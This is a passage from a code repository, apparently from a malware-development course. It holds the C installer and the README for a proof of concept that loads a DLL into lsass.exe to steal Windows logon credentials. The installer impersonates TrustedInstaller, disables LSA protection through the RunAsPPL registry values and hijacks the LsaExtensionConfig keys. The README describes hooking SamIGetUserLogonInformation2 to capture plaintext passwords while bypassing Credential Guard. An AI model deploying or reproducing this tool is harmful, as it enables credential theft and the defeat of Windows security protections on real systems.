325 |     wprintf(L"[*] Successfully Set '%s' To [%d]\n", szValueName, dwNewValue);
326 |     
327 |     RegFlushKey(hKey);
328 | 
329 |     bResult = TRUE;
330 | 
331 | _END_OF_FUNC:
332 |     if (hKey)
333 |         RegCloseKey(hKey);
334 |     return bResult;
335 | }
336 | 
337 | 
338 | // ===============================================================================================================================================================================
339 | 
340 | static inline LPCWSTR GetFileNameW(IN LPCWSTR szPath) 
341 | {
342 |     LPCWSTR p1 = wcsrchr(szPath, L'/');
343 |     LPCWSTR p2 = wcsrchr(szPath, L'\\');
344 |     LPCWSTR pT = (p1 > p2 ? p1 : p2);
345 |     return pT ? pT + 1 : szPath;
346 | }
347 | 
348 | // ===============================================================================================================================================================================
349 | 
350 | VOID PrintUsage(IN LPCWSTR argv0)
351 | {
352 |     fwprintf(stderr,
353 |         L"[#] Usage:\n"
354 |         L"  %s --input <dll.path> [--name <dll.name>]\n"
355 |         L"      Copies the specified DLL into System32 and sets registry keys\n"
356 |         L"      --input <dll.path>   : Path to the source DLL (required).\n"
357 |         L"      --name <dll.name>    : Optional name for the DLL in System32\n"
358 |         L"                             (defaults to base name of <dll.path>).\n\n"
359 |         L"  %s --restore\n"
360 |         L"      Removes the deployed DLL from System32 and cleans up registry keys\n\n"
361 |         L"  %s /? or %s -?\n"
362 |         L"      Displays this help message.\n\n"
363 |         L"Examples:\n"
364 |         L"  %s --input Dummy.dll\n"
365 |         L"  %s --input Dummy.dll --name MyDummy.dll\n"
366 |         L"  %s --restore\n\n",
367 |         GetFileNameW(argv0), GetFileNameW(argv0),
368 |         GetFileNameW(argv0), GetFileNameW(argv0),
369 |         GetFileNameW(argv0), GetFileNameW(argv0), GetFileNameW(argv0));
370 | }
371 | 
372 | // ===============================================================================================================================================================================
373 | 
374 | BOOL CopyDllToSystem32(IN LPCWSTR szDllPath, IN LPCWSTR szDllName) {
375 | 
376 | 
377 | 	HRESULT     hResult                 = S_OK;
378 |     WCHAR       szDestPath[MAX_PATH]    = { 0 };
379 | 
380 |     if (!szDllPath || !szDllName)
381 |         return FALSE;
382 | 
383 |     if (wcslen(szDllPath) > MAX_PATH || wcslen(szDllName) > MAX_PATH)
384 |         return FALSE;
385 | 
386 |     if (FAILED((hResult = StringCchPrintfW(szDestPath, MAX_PATH, L"%s\\%s", L"C:\\Windows\\System32", szDllName)))) {
387 | 		wprintf(L"[!] StringCchPrintfW Failed With Error: 0x%08X\n", hResult);
388 | 		return FALSE;
389 |     }
390 | 
391 | 	// Not forcing overwrite
392 |     if (!CopyFileW(szDllPath, szDestPath, FALSE)) {
393 |         wprintf(L"[!] CopyFileW Failed With Error: %lu\n", GetLastError());
394 |         PrintErrorMessageW(GetLastError());
395 | 		return FALSE;
396 |     }
397 | 
398 | 	wprintf(L"[*] Copied '%s' To '%s'\n", szDllPath, szDestPath);
399 | 	return TRUE;
400 | }
401 | 
402 | 
403 | BOOL DeleteDllFromSystem32(IN LPCWSTR szDllName) {
404 | 
405 |     HRESULT     hResult                 = S_OK;
406 | 	WCHAR       szDestPath[MAX_PATH]    = { 0 };
407 | 	
408 |     if (!szDllName)
409 | 		return FALSE;
410 | 	
411 |     if (wcslen(szDllName) > MAX_PATH)
412 | 		return FALSE;
413 | 
414 |     if (FAILED((hResult = StringCchPrintfW(szDestPath, MAX_PATH, L"%s\\%s", L"C:\\Windows\\System32", szDllName)))) {
415 |         wprintf(L"[!] StringCchPrintfW Failed With Error: 0x%08X\n", hResult);
416 |         return FALSE;
417 |     }
418 | 	
419 |     if (!DeleteFileW(szDestPath)) {
420 | 		wprintf(L"[!] DeleteFileW Failed With Error: %lu\n", GetLastError());
421 | 		PrintErrorMessageW(GetLastError());
422 | 		return FALSE;
423 | 	}
424 | 	
425 |     wprintf(L"[*] Deleted '%s'\n", szDestPath);
426 | 	return TRUE;
427 | }
428 | 
429 | 
430 | // ===============================================================================================================================================================================
431 | 
432 | 
433 | 
434 | int wmain(int argc, wchar_t* argv[]) {
435 | 
436 | 	DWORD       dwPPLRegValueToSet  = 0x00;
437 |     WCHAR*      szDllNameToSet      = NULL;
438 |     WCHAR*      szDummyDllPath      = NULL;
439 |     WCHAR*      szQueriedDllName    = NULL;
440 |     BOOL        bRestoreMode        = FALSE;
441 | 
442 |     if (argc == 1)
443 |     {
444 |         PrintUsage(argv[0]);
445 |         return 0;
446 |     }
447 | 
448 |     if (argc == 2 && (wcscmp(argv[1], L"/?") == 0 || wcscmp(argv[1], L"-?") == 0)) 
449 |     {
450 |         PrintUsage(argv[0]);
451 |         return 0;
452 |     }
453 | 
454 | 
455 |     if (!EnablePrivilege(SE_DEBUG_NAME))        return -1;
456 |     if (!EnablePrivilege(SE_IMPERSONATE_NAME))  return -1;
457 | 
458 |     printf("[*] Enabled SeDebugPrivilege and SeImpersonatePrivilege\n");
459 | 
460 |     if (!ImpersonateTrustedInstaller())         return -1;
461 | 
462 |     printf("[*] Impersonated TrustedInstaller\n");
463 | 
464 |     // Restore mode
465 |     if (argc == 2 && wcscmp(argv[1], L"--restore") == 0) 
466 |     {
467 | 		dwPPLRegValueToSet  = 0x02;
468 | 		szDllNameToSet      = OG_DLL_NAME_TO_SET_1001;
469 |         bRestoreMode        = TRUE;
470 | 
471 |         if (!QueryLsaRegKey(
472 |             L"SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\Interfaces\\1002",
473 |             L"Extension",
474 |             &szQueriedDllName))
475 |         {
476 |             return -1;
477 |         }
478 | 
479 |         // Only delete if it isn't the original DLL
480 |         if (wcscmp(szQueriedDllName, OG_DLL_NAME_TO_SET_1001) != 0x00)
481 |         {
482 |             DeleteDllFromSystem32(szQueriedDllName);
483 |         }
484 |         else
485 |         {
486 | 			wprintf(L"[!] Cant Delete The Original DLL: %s\n", OG_DLL_NAME_TO_SET_1001);
487 | 			LocalFree(szQueriedDllName);
488 |         }
489 |     }
490 |     else 
491 |     {
492 |         if (!bRestoreMode)
493 |         {
494 |             for (int i = 1; i < argc; i++)
495 |             {
496 |                 if (wcscmp(argv[i], L"--input") == 0 && i + 1 < argc)
497 |                 {
498 |                     szDummyDllPath = argv[++i];
499 |                 }
500 |                 else if (wcscmp(argv[i], L"--name") == 0 && i + 1 < argc)
501 |                 {
502 |                     szDllNameToSet = argv[++i];
503 |                 }
504 |                 else
505 |                 {
506 |                     fwprintf(stderr, L"[!] Unknown Parameter: %s\n", argv[i]);
507 |                     PrintUsage(argv[0]);
508 |                     return -1;
509 |                 }
510 |             }
511 | 
512 |             if (!szDummyDllPath)
513 |             {
514 |                 fwprintf(stderr, L"[!] --input <dll.path> Is Required\n");
515 |                 PrintUsage(argv[0]);
516 |                 return -1;
517 |             }
518 | 
519 |             dwPPLRegValueToSet = 0x00;
520 | 
521 |             if (!szDllNameToSet)
522 |                 szDllNameToSet = GetFileNameW(szDummyDllPath);
523 |             else
524 | 			{
525 | 				if (wcslen(szDllNameToSet) < 4 || _wcsicmp(szDllNameToSet + wcslen(szDllNameToSet) - 4, L".dll") != 0)
526 | 				{
527 | 					fwprintf(stderr, L"[!] Input DLL Name Must End With .dll\n");
528 | 					return -1;
529 | 				}
530 | 			}
531 | 
532 |             if (!CopyDllToSystem32(szDummyDllPath, szDllNameToSet))
533 |             {
534 |                 return -1;
535 |             }
536 |         }
537 |     }
538 | 
539 |     printf("[i] %s PPL Settings...\n", bRestoreMode ? "Enabling" : "Disabling");
540 | 
541 | 	if (!EditProtectedProcessLight(
542 | 		L"SYSTEM\\CurrentControlSet\\Control\\Lsa",
543 | 		L"IsPplAutoEnabled",
544 |         dwPPLRegValueToSet)) {
545 | 		return -1;
546 | 	}
547 | 
548 | 	if (!EditProtectedProcessLight(
549 | 		L"SYSTEM\\CurrentControlSet\\Control\\Lsa",
550 | 		L"RunAsPPL",
551 |         dwPPLRegValueToSet)) {
552 | 		return -1;
553 | 	}
554 | 
555 | 	if (!EditProtectedProcessLight(
556 | 		L"SYSTEM\\CurrentControlSet\\Control\\Lsa",
557 | 		L"RunAsPPLBoot",
558 |         dwPPLRegValueToSet)) {
559 | 		return -1;
560 | 	}
561 | 
562 |     printf("[i] %s LSA Extension DLL Name ... \n", bRestoreMode ? "Restoring" : "Hijacking");
563 | 
564 |     if (!EditLsaRegKey(
565 | 		L"SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\Interfaces\\1001",
566 | 		L"Extension",
567 |         szDllNameToSet))
568 | 	{
569 | 		return -1;
570 | 	}
571 | 
572 |     if (!EditLsaRegKey(
573 |         L"SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv",
574 |         L"Extensions",
575 |         szDllNameToSet))
576 |     {
577 |         return -1;
578 |     }
579 | 
580 | 
581 |     RevertToSelf();
582 | 
583 |     return 0;
584 | }


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2025 NULL
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## HookingLsassForCredentials
 2 | 
 3 | </br>
 4 | 
 5 | ### Quick Links
 6 | 
 7 | [Maldev Academy Home](https://maldevacademy.com)
 8 |   
 9 | [Maldev Academy Syllabus](https://maldevacademy.com/syllabus)
10 | 
11 | [Offensive Phishing Operations](https://maldevacademy.com/phishing-course)
12 | 
13 | </br>
14 | 
15 | ## Explanation
16 | 
17 | The goal of this PoC is to leverage the registry key discovered [here](https://github.com/Maldev-Academy/LsassHijackingViaReg) to load a DLL into Lsass.exe that will allow us to fetch the user's credentials (in any form possible) while effectively bypassing Credential Guard. It is worth mentioning that when Credential Guard is enabled, Lsass.exe hands over credential protection and caching to LsaIso.exe, however, Lsass.exe remains the one responsible for verifying the login user credentials.
18 | 
19 | </br>
20 | 
21 | ## How It Works
22 | 
23 | * The initial objective was to retrieve a populated [USER_INTERNAL6_INFORMATION](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1430) structure to access the [USER_ALL_INFORMATION](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1340) structure, allowing us to read critical elements like [NtPassword](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1359C20-L1359C30) and [LmPassword](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1358) during initial user authentication process. However, this structure is based on the [WhichFields](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1199) parameter of the targeted API.
24 | 
25 | * To capture a `USER_INTERNAL6_INFORMATION` structure, we hooked [samsrv!SamIGetUserLogonInformation2](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L855). However this function and its caller (named [lsasrv!LsapSamExtGetUserLogonInformation2](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L816)) override their `WhichFields` parameter and forcibly setting it to `0x1B`. This value is explained [here](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L1040). Therefore, we thought of manually altering this value to be equal to [USER_ALL_READ_TRUSTED_MASK2](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L1049), hoping to read the aforementioned elements. Upon doing this, `SamIGetUserLogonInformation2` returned `STATUS_INVALID_INFO_CLASS` as explained [here](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L1293).   
26 | 
27 | * As an alternative, we placed a hook at the start of the `SamIGetUserLogonInformation2` function. In the detour function, we read `UNICODE_STRING` structures relative to the `R8` register. These structures held valuable information like the plaintext password entered by the user at the lock screen, the username, and the workstation. However, this approach proved unstable (we were unable to fetch valuable data each time), rendering the PoC currently as a *work-in-progress* (WIP).
28 | 
29 | * It is worth mentioning that the current PoC waits for the LogonUI.exe process to start to install the hook/s. LogonUI.exe is the process responsible for displaying the Windows login screen and securely capturing user credentials.
30 | 
31 | </br>
32 | 
33 | 
34 | ## Demo
35 |   
36 | 
37 | 1. Installing the [Dummy DLL](https://github.com/NUL0x4C/HookingLsassForCredentials/tree/main/DumpHashes) and editing the `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LsaExtensionConfig\Interfaces\1001` registry key's value to load our DLL that will execute our code and act as a proxy to the `lsasrv.dll` DLL. 
38 | 
39 | </br>
40 | 
41 | ![PIC1](https://github.com/user-attachments/assets/691b6e80-33f1-4bdd-b195-3cd4bc03eaa1)
42 | 
43 | </br>
44 | </br>
45 | 
46 | 2. Upon reboot, we captured the login plaintext password with Credential Guard being enabled. The image below is the truncated output of the `cat C:\DummyDebug.log` command. Which is the [DEBUG_FILE](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/Log.h#L4C33-L4C43).
47 | 
48 | </br>
49 | 
50 | 
51 | ![PIC2](https://github.com/user-attachments/assets/58944393-5b83-4d45-a3ec-2b969160b28e)
52 | 
53 | 
54 | </br>
55 | 
56 | 
57 | ### Reference:
58 | * [LsassHijackingViaReg](https://github.com/Maldev-Academy/LsassHijackingViaReg)
59 | 
60 | * [phnt/ntsam.h](https://github.com/winsiderss/phnt/blob/master/ntsam.h)
61 | 
62 | * [Utilizing Hardware Breakpoints For Hooking (2)](https://maldevacademy.com/new/modules/10)
63 | 
64 | * [rad98-hooking-engine](https://github.com/vxunderground/VX-API#rad98-hooking-engine)
65 | 


--------------------------------------------------------------------------------